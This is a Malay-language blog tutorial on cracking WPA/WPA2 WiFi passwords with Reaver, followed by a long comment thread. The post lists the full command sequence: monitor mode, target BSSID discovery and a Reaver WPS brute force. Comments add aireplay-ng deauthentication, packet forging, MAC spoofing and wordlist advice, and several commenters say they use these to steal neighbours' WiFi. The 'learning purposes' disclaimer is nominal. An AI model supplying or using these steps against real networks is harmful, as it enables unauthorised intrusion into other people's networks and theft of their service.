Cara-cara crack password WiFi yang menggunakan WPA/WPA2

Dalam artikel yang lepas saya ada menerangkan langkah-langkah untuk crack password WiFi yang menggunakan WEP. Namun sekarang ni dah tak banyak dah rangkaian yang menggunakan sekuriti jenis WEP ini, kebanyakannya menggunakan WPA/WPA2.

Jadi kali ini saya akan menerangkan secara ringkas langkah-langkah untuk crack WPA/WPA2. Ingat, semua ini adalah untuk tujuan pembelajaran, terpulanglah bagaimana anda menggunakannya. 

Sama seperti sebelumnya, anda memerlukan:

  • Wireless adapter yang boleh melakukan packet injection. Saya menggunakan Alfa AWUS050NH yang dibeli dari eBay.
  • Linux sebagai sistem operasi, ataupun Backtrack Live CD.

Berbanding dengan WEP, cara untuk crack WPA/WPA2 adalah lebih mudah kerana kita akan menggunakan Reaver. Arahannya senang, cuma anda perlu menunggu lebih lama untuk mendapatkan hasil. Jom kita mula:

1.  Install Reaver.

apt-get install reaver

2. Dapatkan nama interface bagi kad wireless anda.

iwconfig

3. Pada komputer saya, Alfa AWUS050NH adalah wlan1. Seterusnya, letakkan kad wireless anda pada keadaan monitor.

airmon-ng start wlan1

Skrin akan memaparkan nama bagi interface monitor anda, biasanya adalah mon0. Catatkan nama ini.

4. Dapatkan BSSID bagi WiFi yang anda mahu crack.

airodump-ng wlan1

Nota: Jika arahan di atas tidak berjaya, gantikan name interface kad wireless anda (dalam kes saya, ianya adalah wlan1) dengan nama interface monitor.

5. Mulakan crack dengan Reaver.

reaver -i moninterface -b bssid -vv

Sebagai contoh, arahan saya adalah reaver -i mon0 -b 34:08:04:C9:D0:04 -vv

Biarkan sahaja arahan ini berjalan sehinggalah Reaver berjaya mendapatkan password yang anda cari. Reaver akan memaparkan PSK yang boleh anda gunakan untuk masuk ke rangkaian tersebut, seperti rajah di bawah ini:

Selamat mencuba!

93 thoughts on “Cara-cara crack password WiFi yang menggunakan WPA/WPA2”

    1. Bergantung. Cubaan pertama saya berjaya dalam masa dua jam, tapi yang kali kedua ni dah setengah hari tak habis-habis lagi.

  1. kalau wpa tu nombor agak laju la nak crack…. kalau alphanumerical jadi la lama…macam aku gabungkan 4 jenis, huruf besar, kecil, nombor dan simbol….panjangnya 18 aksara….hehehehe

    1. reaver tak brute force sebenarnya…dia guna satu kelemahan router..setiap router akan auto on WPS aka wireless protected access. password dia hanya nombor sahaja…..WPS ni on default & kalau disable dalam router pon..dia still on gak sebenarnya…so in theory cracking nombor sahaja lagi laju dari crack password….

      1. sorry..aku nak cakap..dia brute force jugak…tp guna nombor sahaja…

        lagi satu…ko anggap jer orang kat malaysia ni maals…password selalu nyer huruf kecik n nombor sahaja….kekadang nombor telefon sahaja..so cadangan aku adalah try guna combination nombor sahaja ataupon tambah abc dah cukup..kalau tak dapat….leh sambung abcdefgh dan seterusnya

    2. reaver takde kene mengena dengan berapa panjang wpa punya key. dia bergantung kepada signal, dan router itu sendiri.

      reaver guna vulnerability dalam wps, dimana wps pin ada 8 character yang hanya pakai number sahaja. jadi possibility yang ada untuk 8 character, numerical cuma 10^8. 100000000 possibility.

      berbanding dengan wpa, dimana bole gune 26 alpha(huruf), 10 numerical, dan 26 ALPHA(huruf besa), possibility yang ada 26^8 x 10^8 x 26^8. ada 4360874289942887405977600000000 keys lebih kurang.

  2. sy x berapa paham la guide yg ko bg ni.huhuhu..macam translate dr english je..antramuka 2 ape?adess…hbis dlm guide ni ape yg perlu install?

  3. hahaha..jngan marah bro.sory la..aku x paham antaramuka 2 je. ape dia ekk..biase la bro ore klate ni kadang2 dop pehe bahasa surat ni..hahahaaa..aku dah blajar laa..wep pun ko jgak yg ajar aku dlu..adess.lamo dop timbul dale ni keno pakoh slalu.huhuhuhu

    1. Ohh… baru la aku faham apa yang ko tak faham. Haha. Antaramuka tu interface. Aih susah la pulak guna istilah bahasa melayu ni. Aku tukar balik la jadi interface.

  4. salam bro…nak tanya kalu pakai wireless injection brand comfast utk crack wpa bleh x? bro pandai x? sbb sblom ni dah penah crack wep…nak try wpa lak…kalu pandai leh tulung ajarkan x?…tq bro

  5. brooo…
    saya nak tanya,,
    kalau kite hack line wifi yang takde package file transfer ( xde sape online)
    pun boleh jgk ke..?
    sy slalu pilih line yg ad org tgh gune..
    baru laju sikit die inject..

    1. Betul la tu, lebih baik pilih line yang banyak orang guna, baru senang dia kumpul data. Kalau tak memang lama la baru boleh crack.

    2. boleh

      aireplay -4 -b bssid mon0

      atau

      aireplay -5 -b bssid mon0

      output dari atas kene akan dapat .xor dan .cap file, kene forge packet ni gune

      packetforge-ng -0 -a targetbssid -h sendiriPunyeMacAddress -k 255.255.255.255 -l 255.255.255.255 -y fragment-yang-dapat-dari-atas.xor -w arp-request

    1. salah pemahaman ni.

      linux tu adelah Operating system yang menyerupai Unix. Dalam Linux ada banyak jenis, macam ubuntu, fedora, Debian dan lain lain. backtrack adelah sejenis linux yang berasaskan kepada ubuntu

      reaver lak sejenis program. dalam backtrack 5r2 dah ade dah siap siap reaver kalau tak silap

  6. sorry bro… nak crack WEP dah settle… lane kat tepi umah banyak pakai WPA2… pakai feeding bottle pun payah nak crack jugak….. tolong bagi tip sikit bro….

    1. wpa2 kalau nak crack, bergantung kepada processing power. tak boleh expect benda akan siap dalam masa 5 atau seploh minit sahaja. cara paling senang kene ade dictionary, dimana dalam dictionary tu ade password user

      cara kedua, kene pipe masuk password tu gune john the ripper atau crunch, atau wordfield, dimana JTR atau crunch akan supply possible character bergantung kepada beberapa kriteria yang user kene masukkan

      contoh, kita agak target pakai 10 character, dan cuma akan pakai number dan huruf

      so user kene masukkan kriteria ini dalam dalam wordfield, dan gunekan aircrack untuk test key tersebut.

  7. bro ni step dari mule2 buka terminal backtrack ke?
    mase install reaver tu kan camner die leh install? ltk kt mane? dekstop? or die akan detect sndri? sowi xfaham sgt…

    kalo ade pape.explain leh email fahmiazlan8999@gmail.com

    1. kalau backtrack versi 5, rasanya takde reaver, jadi anda kene install reaver tu

      apt-get install reaver <– ni adalah command untuk install apa apa sahaja program. tapi anda kene ada internet connection, backtrack akan sambung kepada repository dan dia akan install program yang anda mahu. ini adalah basic ubuntu punya command.

  8. Bang, nak tanya , mane dapat beli wireless card with packet injector dan software yang boleh hack wifi password wep dan wpa?

    1. interface apa yang dimaksudkan? kalau interface untuk reaver, kene cari package untuk gui tersebut la. tak silap xiaopanOS dah ade siap. ni memang untuk noob, die klik klik je.

      backtrack lebih kepada mereka yang nak belajar macam mana benda tu terjadi.

  9. nak tanya sikit reaver tu ape? nape mase aku taip apt-get install reaver dia jwap reaver: command not found

  10. salam..bro aku crack pki backtrack 4..tuk wep dlm 15mnt aku da dpt key dye tp kalo wpa susah x lepas2..aku fail mse nk dptkn wpa handshake tu..bole bantu bab handshake ni..da mcm2 cara wt tp still x dpt jgk..

    1. nak dapatkan handshake, anda kene deauth client yang sedia ada

      situasi dia macam ni. anda nak hack wifi saya. saya tengah guna internet, anda perlu disconnectkan saya terlebih dahulu. kebiasannya, windows akan auto connect balik lepas DC, time ni la baru dapat capture handshake tu

      ada dua cara nak dapatkan handshake, satu Disconnectkan target anda, cara kedua, tunggu je sampai ada orang connect.

      command untuk deauth

      aireplay-ng -0 1 -a RouterBSSID -c MacAddressConnectedClient mon0

  11. salam bro..

    1)aku dah pasang wireless card. tp backtrack tak detect wireless aku. mcm mana nak install driver yeks???

    2) mcm mana nak dapatkan reaver???

    thanks bro

  12. itu kan cara yg online instaler,tidak akan bekerja bila kita tak punya sinyal ,yg lebih power lagi reaver offline instaler bro,jadi ta perlu internet buat instal reaver nya

  13. Sebagai latihan boleh la tapi kalau nak “tumpang” wireless org sangat2 tak berbaloi. nak kena tunggu 4-5 jam baru dapat decrypt, itu belum lagi berjaya atau tak :)

  14. bro, sy pakai BT5R2 dalam VMWare, tapi dah 2 hari pun belum dapat crack WPA/WPA2 PSK lagi ni…ada apa solution?? sy stuck dkat itu seja….

    Please reply

    Thank you.

  15. hi bro….saya menghadapi masalah dimana reaver memaparkan mesej bahawa “FAILED TO ASSOCIATE ” dgn AP ….boleh anda tlg sya…power AP adalah 91..

    1. ni kemungkinan besar dia ada buat MAC filter, dimana hanya MAC tertentu sahaja yang bole associate

      anda kene spoof MAC anda sama jadi MAC connected client baru boleh associate.

  16. salam bos, nk tnyo ckit caro mano hk paling ringkas dan laju utk crack password wep/wpa/wpa2/wps….??
    kawe smggu dh duk try hk taman sbelah sapa loni xleh lg, sero nk tohok sungai jh modem nih….
    kwe guno xionpan( linux tiny core), BT5R3…runing paka vmware sumo xleh…

    mitok tlg sunggoh2 ni…..modem signal king 10tn…

    1. nak crack wep bleh tp kalu nak crack wpa susoh ckit….demo masuk cd 2 pah 2 demo restat smula komp…bila masuk interfece dia nt demo tkan la scan…tp sblm scan tkar encryption kpd wep..br leh stat scan…lepah scan demo pilih sgnal hok paling kuat…..tgk PWR paling rendah….pah2 klik LANCH…tgu samapi dia saip crack…pastikn FVS GOT(HOK WARNA MERAH BERGRAK JGK)…biasanye amek masa dlm 7-10minit jer..kalu lbh tutp wat smula..pilih hok len plok…

  17. reaver nk run mcm mane??? ape lg yg perlu ada yea….. jiwa ambo skrg nie masih kosong……..! kosong……! kosong……..! mintak tnjuk ajar yea dri A smpai Z

  18. salam bro…beny core linux tu penah gune x…wep bley crack..tp wpa2 tu xreti la….yg bro punye tu bli mna..harge bape..name ape benda tu…hehe……klu ley blas kat email ni cantek lg…zeck_jr@yahoo.com…..hehe

  19. lor masing2 nak hack tp satu haram x tau nak kene suap mcm budak2..xde jiwa hack x payah la nak hack….carik la info kat google…nak senang jer dah la nak mencurik…hehehe

  20. “reaver” dah sedia install kat backtrack.
    exploitation tool -> wirelees exploitation ->
    wlan exploitation-> reaver. atau buka ja trimanal dan taip “reaver”, pas tu tekan enter.
    .taip ‘ifconfig’, dan kat situ ada nama2 seperti ‘wlan0′ , ‘eth0′ itulah interface.

  21. salam semua … morningg … dah lamo aku dok cuba crack wpa nih tapi tak boleh tembus lagik … kalu wep senang … sapa yang nak cari wirelles adapter yang leh send packet dan bole hack wep siap ada cd linux … meh bagitau kawe

  22. aku tak paham la……bagaimana nak guna Signalking 10TN ni….yg leh hack password ni….dah cuba install tp belum lg dpt guna….hanya nak connect dgn wifi kpg tanpa wayer….password /username …dah tau da…(pakai PC ye bkn laptop de)….di kpg aku yg jarak dlm 200m….Anak buahku guna laptop dpt juga connect tp 1 2 bar saja…Bagaimana ye…..aku cari ilmu tentang bab ni…boleh bantu.

    1. wap2 -psk saya tak pasti boleh hack..adakh yg pernah dpt bagaimana cara kongsi sikit ? sya guna miniwep dan feeding bottol sehari pun tk dpt

  23. ade sape2 penah bejaye crack wpa yg PWR -60 ke atas?(yang agak jauh)aku try xpenah dpt associate ngn AP.ke kene pkai adapter yg bole tarik lagi kuat?

  24. BANYAK PULAK CENGKADAK ORG DAH KASI TUTORIAL TU BELAJAR LA SNDIRI.

    BELI WIFI SENDIRI LA SENANG

    WAKKAKAKA

  25. aku pun xdpt hackla wpa (unifi) ni… semua steps dh follow, dah google mcm2 web yg ajar pun still xdpt settle… masalah die asyik stuck dkt:

    WARNING: Failed to associate with xx:xx:xx:xx:xx (bssid la kan)

    so mcmmane nk settlekan masalah associate ni???

    1. WARNING: Failed to associate with xx:xx:xx:xx:xx
      error ni sbb dier failed nak dpt feedback dr device (router) benda ni jadi sbb TM da upgrade firmware dlink yg diorang gune utk unifi, firmware yg baru ni dier disable auto associate function dlm device (kalau tak silap la) walaupun WPS still on

      tp still ader cara utk associate secara manual, nak kene bukak satu lg terminal and run command utk associate, command boleh dpt kat https://code.google.com/p/reaver-wps/issues/list
      tp nak kene selak satu2 la (nak ilmu kene usaha skit)

  26. bende ni perlukan software ke? kalau bende ni menggunakan software boleh tolong bagi link download x?

    1. halal kalau ko crack utk tujuan belajar/ nak tau camner nak crack, bukak crack password utk tumpang wifi org.

      kite kene tau camner org hack password wifi, br la kite leh defend wifi kite sendiri

    2. ko boleh tanye halal ke haram.. da masuk secara haram tentu2 la haram.. lain la klu tuan empunya kasik kebenaran (kompem la x.. klu x.. xdela ko hack kan) ~_~

  27. kalau internet wifi pon nak curik org punye…
    macam mana nak berkat dalam hidup..
    cuba la bersusah skit…asik nk free aje..
    ‘THIS IS MALAYSIA’
    btw : sepandai2 cracker…dy xkan boleh crack wifi yg tgh off..

  28. hii..tumpang tanya..kenapa windows 7 saya dulu dpat cari line wifi..tp sekarang takdpt?apakah masaalahnya..bluetooth pun tak dapt jugak..dulu dpt gak

  29. ada sapa yang tau macam mana nak install kat apple mac?? kat pc windows blh je. tapi cuna masuk kat apple mac. nak install signal pun tak leh. jangan kata nak hack.

    adoii. tolongggg

  30. Halal etfygv. Lagipun sy student miskin mana mapu nak bayar wifi bulan2. mn nak bayar note 3 lg, keluar dating, tgk wayang. lagipun sy curi wifi dr jiran jer..mcm kawan-kawan. jiran sy tu hidup dia tak bayar apa2 langsung mcm org lain, pakailah signal king jugak, biar semua orang pakai signalking, halal la katakan.

  31. “Sesiapa yang menyeru kearah hidayah dan pekerjaan yang baik, dia akan mendapat pahala sama banyak dengan pahala orang-orang yang mengikutnya. Dan tidak mengurangi sedikit pun pahala orang-orang yang mengikutinya. Begitu juga, sesiapa yang menyeru kejalan kesesatan, dia akan mendapat dosa sepertimana dosa orang-orang yang mengikuti kesesatan itu. Dan kerananya tidaklah berkurangan dosa orang-orang yang mengikutinya itu.” (Hadis riwayat Muslim)

    Hukum CURI line wifi (nama pun CURI):
    http://www.youtube.com/watch?v=tmtKnARSuRQ

    1. aku guna wifislax.wep paling cepat dpt pswd 4mint…
      klu wpa/wps cuma2 mint je,,,tp ade jgk yg xblh nk crack

  32. internet tu keperluan so kenapa kerajaan x sediakan percuma atau dengan harga yang murah dan berkelajuan tinggi.
    so klu x mampu lena lah mencuri.

Leave a Reply

Your email address will not be published. Required fields are marked *

You may use these HTML tags and attributes: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>